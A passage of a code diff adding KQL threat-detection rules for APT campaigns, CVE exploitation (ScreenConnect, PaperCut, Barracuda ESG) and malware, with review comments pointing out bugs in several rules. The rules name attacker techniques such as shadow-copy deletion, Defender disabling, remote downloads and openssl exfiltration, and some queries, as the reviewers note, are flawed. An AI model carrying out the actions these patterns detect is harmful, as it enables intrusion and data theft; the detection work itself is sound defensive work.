"tasklist" or ProcessCommandLine contains "findstr")) or ((ProcessCommandLine contains "http" and FolderPath endswith "\\curl.exe") or (ProcessCommandLine contains "localgroup Administrators" and ProcessCommandLine contains "/add") or (ProcessCommandLine contains "net" and (ProcessCommandLine contains "user" and ProcessCommandLine contains "/add")) or ((ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableAntiSpyware" and ProcessCommandLine contains "\\Microsoft\\Windows Defender") or (ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableRestrictedAdmin" and ProcessCommandLine contains "CurrentControlSet\\Control\\Lsa")) or (ProcessCommandLine contains "E:jscript" or ProcessCommandLine contains "e:vbscript") or (ProcessCommandLine contains "vssadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadows") or (ProcessCommandLine contains "wbadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog") or (ProcessCommandLine contains "http" and FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "process call create") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadowcopy"))) and (not((ProcessCommandLine contains "download.microsoft.com" and ProcessCommandLine contains "manageengine.com" and ProcessCommandLine contains "msiexec")))
\ No newline at end of file
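Review bot: The ManageEngine rule's regex `query\\ssession` has lost the `+` quantifier that its sibling AsperaFaspex rule uses (`query\\s+session`), so the two rules, which otherwise share an identical command-line indicator list, disagree on how much whitespace they tolerate; it should read `ProcessCommandLine matches regex "query\\s+session"`. The `net\\s+user`/`net\\s+group` tests are consistent between the two, which suggests this one is a transcription slip rather than intent. Separately, KQL `matches regex` is case-sensitive while the surrounding `contains` tests are not, so these four regexes only see lower-case spellings in both rules; prefixing them with `(?i)` would make them as tolerant as the rest of the clause.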
diff --git a/KQL/rules-emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/potential_apt_mustang_panda_activity_against_australian_gov.kql b/KQL/rules-emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/potential_apt_mustang_panda_activity_against_australian_gov.kql
new file mode 100644
index 00000000..82f54647
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/potential_apt_mustang_panda_activity_against_australian_gov.kql
@@ -0,0 +1,12 @@
+// Title: Potential APT Mustang Panda Activity Against Australian Gov
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.g0129, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "copy SolidPDFCreator.dll" and ProcessCommandLine contains "C:\\Users\\Public\\Libraries\\PhotoTvRHD\\SolidPDFCreator.dll") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains "\\Windows\\CurrentVersion\\Run" and ProcessCommandLine contains "SolidPDF" and ProcessCommandLine contains "C:\\Users\\Public\\Libraries\\PhotoTvRHD\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Onyx-Sleet/onyx_sleet_apt_file_creation_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Onyx-Sleet/onyx_sleet_apt_file_creation_indicators.kql
new file mode 100644
index 00000000..60520517
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Onyx-Sleet/onyx_sleet_apt_file_creation_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Onyx Sleet APT File Creation Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects file creation activity that is related to Onyx Sleet APT activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ":\\Windows\\ADFS\\bg\\inetmgr.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_exploitation_related_indicators.kql b/KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_exploitation_related_indicators.kql
new file mode 100644
index 00000000..795a80c1
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_exploitation_related_indicators.kql
@@ -0,0 +1,12 @@
+// Title: PaperCut MF/NG Exploitation Related Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-25
+// Level: high
+// Description: Detects exploitation indicators related to PaperCut MF/NG Exploitation
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /c " and ProcessCommandLine contains "powershell" and ProcessCommandLine contains "-nop -w hidden" and ProcessCommandLine contains "Invoke-WebRequest" and ProcessCommandLine contains "setup.msi" and ProcessCommandLine contains "-OutFile") or (ProcessCommandLine contains "msiexec " and ProcessCommandLine contains "/i " and ProcessCommandLine contains "setup.msi " and ProcessCommandLine contains "/qn " and ProcessCommandLine contains "IntegratorLogin=fimaribahundq")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_potential_exploitation.kql b/KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_potential_exploitation.kql
new file mode 100644
index 00000000..e0de122d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_potential_exploitation.kql
@@ -0,0 +1,12 @@
+// Title: PaperCut MF/NG Potential Exploitation
+// Author: Nasreddine Bencherchali (Nextron Systems), Huntress DE&TH Team (idea)
+// Date: 2023-04-20
+// Level: high
+// Description: Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\bash.exe" or FolderPath endswith "\\calc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\pc-app.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Peach-Sandstorm/peach_sandstorm_apt_process_activity_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Peach-Sandstorm/peach_sandstorm_apt_process_activity_indicators.kql
new file mode 100644
index 00000000..dce74b98
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Peach-Sandstorm/peach_sandstorm_apt_process_activity_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Peach Sandstorm APT Process Activity Indicators
+// Author: X__Junior (Nextron Systems)
+// Date: 2024-01-15
+// Level: high
+// Description: Detects process creation activity related to Peach Sandstorm APT
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "QP's*(58vaP!tF4"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_barracuda_esg_exploitation_indicators.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_barracuda_esg_exploitation_indicators.kql
new file mode 100644
index 00000000..1d8ce1ba
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_barracuda_esg_exploitation_indicators.kql
@@ -0,0 +1,12 @@
+// Title: UNC4841 - Barracuda ESG Exploitation Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "/11111.tar" or FolderPath endswith "/aacore.sh" or FolderPath endswith "/appcheck.sh" or FolderPath endswith "/autoins" or FolderPath endswith "/BarracudaMailService" or FolderPath endswith "/etc/cron.daily/core_check.sh" or FolderPath endswith "/etc/cron.daily/core.sh" or FolderPath endswith "/etc/cron.hourly/aacore.sh" or FolderPath endswith "/etc/cron.hourly/appcheck.sh" or FolderPath endswith "/etc/cron.hourly/core.sh" or FolderPath endswith "/get_fs_info.pl" or FolderPath endswith "/imgdata.jpg" or FolderPath endswith "/install_att_v2.tar" or FolderPath endswith "/install_bvp74_auth.tar" or FolderPath endswith "/install_helo.tar" or FolderPath endswith "/install_reuse.tar" or FolderPath endswith "/intent_helo" or FolderPath endswith "/intent_reuse" or FolderPath endswith "/intentbas" or FolderPath endswith "/mod_attachment.lua" or FolderPath endswith "/mod_content.lua" or FolderPath endswith "/mod_require_helo.lua" or FolderPath endswith "/mod_rtf" or FolderPath endswith "/mod_sender.lua" or FolderPath endswith "/mod_udp.so" or FolderPath endswith "/nfsd_stub.ko" or FolderPath endswith "/resize_reisertab" or FolderPath endswith "/resize_risertab" or FolderPath endswith "/resize2fstab" or FolderPath endswith "/rverify" or FolderPath endswith "/saslautchd" or FolderPath endswith "/sendscd" or FolderPath endswith "/snapshot.tar" or FolderPath endswith "/tmp/p" or FolderPath endswith "/tmp/p7" or FolderPath endswith "/tmp/t" or FolderPath endswith "/update_v2.sh" or FolderPath endswith "/update_v31.sh" or FolderPath endswith "/update_v35.sh" or FolderPath endswith "/update_version"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_compressed_files_from_temp_sh_using_wget.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_compressed_files_from_temp_sh_using_wget.kql
new file mode 100644
index 00000000..29eea50f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_compressed_files_from_temp_sh_using_wget.kql
@@ -0,0 +1,10 @@
+// Title: UNC4841 - Download Compressed Files From Temp.sh Using Wget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects execution of "wget" to download a ".zip" or ".rar" files from "temp.sh". As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "https://temp.sh/" and (ProcessCommandLine endswith ".rar" or ProcessCommandLine endswith ".zip") and FolderPath endswith "/wget"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql
new file mode 100644
index 00000000..0c885527
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql
@@ -0,0 +1,10 @@
+// Title: UNC4841 - Download Tar File From Untrusted Direct IP Via Wget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--no-check-certificate" and ProcessCommandLine endswith ".tar" and ProcessCommandLine matches regex "https://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and FolderPath endswith "/wget") and (not((ProcessCommandLine contains "https://10." or ProcessCommandLine contains "https://192.168." or ProcessCommandLine contains "https://172.16." or ProcessCommandLine contains "https://172.17." or ProcessCommandLine contains "https://172.18." or ProcessCommandLine contains "https://172.19." or ProcessCommandLine contains "https://172.20." or ProcessCommandLine contains "https://172.21." or ProcessCommandLine contains "https://172.22." or ProcessCommandLine contains "https://172.23." or ProcessCommandLine contains "https://172.24." or ProcessCommandLine contains "https://172.25." or ProcessCommandLine contains "https://172.26." or ProcessCommandLine contains "https://172.27." or ProcessCommandLine contains "https://172.28." or ProcessCommandLine contains "https://172.29." or ProcessCommandLine contains "https://172.30." or ProcessCommandLine contains "https://172.31." or ProcessCommandLine contains "https://127." or ProcessCommandLine contains "https://169.254.")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_email_exfiltration_file_pattern.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_email_exfiltration_file_pattern.kql
new file mode 100644
index 00000000..6ddf36c6
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_email_exfiltration_file_pattern.kql
@@ -0,0 +1,10 @@
+// Title: UNC4841 - Email Exfiltration File Pattern
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects filename pattern of email related data used by UNC4841 for staging and exfiltration
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath matches regex "/mail/tmp/[a-zA-Z0-9]{3}[0-9]{3}\\.tar\\.gz"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_potential_seaspy_execution.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_potential_seaspy_execution.kql
new file mode 100644
index 00000000..cc460d78
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_potential_seaspy_execution.kql
@@ -0,0 +1,12 @@
+// Title: UNC4841 - Potential SEASPY Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: critical
+// Description: Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "/BarracudaMailService" or FolderPath endswith "/resize2fstab" or FolderPath endswith "/resize_reisertab"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_ssl_certificate_exfiltration_via_openssl.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_ssl_certificate_exfiltration_via_openssl.kql
new file mode 100644
index 00000000..1b1c2190
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_ssl_certificate_exfiltration_via_openssl.kql
@@ -0,0 +1,10 @@
+// Title: UNC4841 - SSL Certificate Exfiltration Via Openssl
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects the execution of "openssl" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":443" or ProcessCommandLine contains ":8080") and (ProcessCommandLine contains "s_client" and ProcessCommandLine contains "-quiet" and ProcessCommandLine contains "-connect") and ProcessCommandLine matches regex "[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and FolderPath endswith "/openssl"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1708/cve_2024_1708_screenconnect_path_traversal_exploitation.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1708/cve_2024_1708_screenconnect_path_traversal_exploitation.kql
new file mode 100644
index 00000000..34569775
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1708/cve_2024_1708_screenconnect_path_traversal_exploitation.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2024-1708 - ScreenConnect Path Traversal Exploitation
+// Author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress
+// Date: 2024-02-21
+// Level: medium
+// Description: This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, cve.2024-1708, detection.emerging-threats
+// False Positives:
+// - This will occur legitimately as well and will result in some benign activity.
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe" and ((FolderPath contains "ScreenConnect\\App_Extensions\\" and FolderPath contains ".ashx") or (FolderPath contains "ScreenConnect\\App_Extensions\\" and FolderPath contains ".aspx"))) and (not(FolderPath =~ "*ScreenConnect\\App_Extensions\*\*"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1709/screenconnect_user_database_modification.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1709/screenconnect_user_database_modification.kql
new file mode 100644
index 00000000..eec23dce
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1709/screenconnect_user_database_modification.kql
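Review bot: `not(FolderPath =~ "*ScreenConnect\\App_Extensions\*\*")` cannot do what the description promises: `=~` is exact case-insensitive equality, so the `*` characters are literal and the exclusion of files nested below `App_Extensions` never applies; the rule therefore fires on every `.ashx`/`.aspx` write anywhere under that tree rather than only in its root. The `\*` sequences are also not standard KQL string escapes, so the query may not even parse in Advanced Hunting. The "root of App_Extensions" requirement is a regex job, e.g. `and not(FolderPath matches regex @"ScreenConnect\\App_Extensions\\[^\\]+\\")`, which rejects any path that has a further directory component after `App_Extensions`. The Diamond Sleet registry rule earlier in this diff has the same pass-through-wildcard problem.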
@@ -0,0 +1,13 @@
+// Title: ScreenConnect User Database Modification
+// Author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress
+// Date: 2024-02-21
+// Level: medium
+// Description: Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
+// This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, cve.2024-1709, detection.emerging-threats
+// False Positives:
+// - This will occur legitimately as well and will result in some benign activity.
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe" and (FolderPath contains "Temp" and FolderPath contains "ScreenConnect") and FolderPath endswith ".xml"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3094/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3094/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql
new file mode 100644
index 00000000..0336753c
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3094/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql
@@ -0,0 +1,12 @@
+// Title: Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process
+// Author: Arnim Rupp, Nasreddine Bencherchali, Thomas Patzke
+// Date: 2024-04-01
+// Level: high
+// Description: Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2024-3094, detection.emerging-threats
+// False Positives:
+// - Administrative activity directly with root authentication might trigger this rule if it's unnecessarily prefixed with "sh -c" or "bash -c"
+
+DeviceProcessEvents
+| where (ProcessCommandLine startswith "bash -c" or ProcessCommandLine startswith "sh -c") and InitiatingProcessFolderPath endswith "/sshd" and AccountName =~ "root"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3400/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3400/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql
new file mode 100644
index 00000000..a8824448
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3400/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql
@@ -0,0 +1,13 @@
+// Title: Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled.
+// As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2024-3400, detection.emerging-threats
+// False Positives:
+// - The PAN-OS device telemetry function does not enforce a standard filename convention, but observations are unlikely.
+
+DeviceFileEvents
+| where (FolderPath contains "{IFS}" or FolderPath contains "base64" or FolderPath contains "bash" or FolderPath contains "curl" or FolderPath contains "http") and FolderPath startswith "/opt/panlogs/tmp/device_telemetry/"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-35250/potential_cve_2024_35250_exploitation_activity.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-35250/potential_cve_2024_35250_exploitation_activity.kql
new file mode 100644
index 00000000..faeeae87
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-35250/potential_cve_2024_35250_exploitation_activity.kql
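Review bot: This query is unlikely to ever return rows as written: `DeviceFileEvents` is fed by the Defender for Endpoint sensor, which does not run on a PAN-OS firewall, while the `/opt/panlogs/tmp/device_telemetry/` path tested in the `where` clause only exists on the appliance. The upstream rule presumably targets the appliance's own file-event log, so the converter has mapped a product it cannot cover onto an endpoint table without signalling that. Either the converter should skip or flag rules whose log source is not an endpoint the sensor observes, or the generated header should state it, e.g. `// Note: requires file events from the PAN-OS appliance itself; not observable via DeviceFileEvents`.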
@@ -0,0 +1,13 @@
+// Title: Potential CVE-2024-35250 Exploitation Activity
+// Author: @eyezuhk Isaac Fernandes
+// Date: 2025-02-19
+// Level: medium
+// Description: Detects potentially suspicious loading of "ksproxy.ax", which may indicate an attempt to exploit CVE-2024-35250.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, cve.2024-35250, detection.emerging-threats
+// False Positives:
+// - Legitimate applications that use Windows Stream Interface APIs.
+// - Media applications that use DirectShow filters.
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\ksproxy.ax" and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (not((InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\app-" and InitiatingProcessFolderPath contains "\\Discord.exe") or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Opera\\opera.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-37085/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-37085/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql
new file mode 100644
index 00000000..de7a844d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-37085/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql
@@ -0,0 +1,12 @@
+// Title: Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group
+// Author: frack113
+// Date: 2024-07-29
+// Level: high
+// Description: Detects execution of the "net.exe" command in order to add a group named "ESX Admins".
+// This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor.
+// VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2024-37085, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "/add" and ProcessCommandLine contains "/domain" and ProcessCommandLine contains "ESX Admins" and ProcessCommandLine contains "group") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) or ((ProcessCommandLine contains "New-ADGroup" and ProcessCommandLine contains "ESX Admins") and ((FolderPath endswith "\\PowerShell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.exe", "pwsh.dll"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-50623/cve_2024_50623_exploitation_attempt_cleo.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-50623/cve_2024_50623_exploitation_attempt_cleo.kql
new file mode 100644
index 00000000..035dfbf2
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-50623/cve_2024_50623_exploitation_attempt_cleo.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2024-50623 Exploitation Attempt - Cleo
+// Author: Tanner Filip, Austin Worline, Chad Hudson, Matt Anderson
+// Date: 2024-12-09
+// Level: high
+// Description: Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1190, cve.2024-50623, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -EncodedCommand" or ProcessCommandLine contains ".Download") and FolderPath endswith "\\cmd.exe" and (InitiatingProcessCommandLine contains "Harmony" or InitiatingProcessCommandLine contains "lexicom" or InitiatingProcessCommandLine contains "VersaLex" or InitiatingProcessCommandLine contains "VLTrader") and InitiatingProcessFolderPath endswith "\\javaw.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/CSharp-Streamer/potential_csharp_streamer_rat_loading_net_executable_image.kql b/KQL/rules-emerging-threats/2024/Malware/CSharp-Streamer/potential_csharp_streamer_rat_loading_net_executable_image.kql
new file mode 100644
index 00000000..ac7eaece
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/CSharp-Streamer/potential_csharp_streamer_rat_loading_net_executable_image.kql
@@ -0,0 +1,10 @@
+// Title: Potential CSharp Streamer RAT Loading .NET Executable Image
+// Author: Luca Di Bartolomeo
+// Date: 2024-06-22
+// Level: high
+// Description: Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002, detection.emerging-threats
+
+DeviceImageLoadEvents
+| where FolderPath matches regex "\\\\AppData\\\\Local\\\\Temp\\\\dat[0-9A-Z]{4}\\.tmp"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/DarkGate/darkgate_drop_darkgate_loader_in_c_temp_directory.kql b/KQL/rules-emerging-threats/2024/Malware/DarkGate/darkgate_drop_darkgate_loader_in_c_temp_directory.kql
new file mode 100644
index 00000000..75a2994d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/DarkGate/darkgate_drop_darkgate_loader_in_c_temp_directory.kql
@@ -0,0 +1,12 @@
+// Title: DarkGate - Drop DarkGate Loader In C:\Temp Directory
+// Author: Tomasz Dyduch, Josh Nickels
+// Date: 2024-05-31
+// Level: medium
+// Description: Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder.
+// MITRE Tactic: Execution
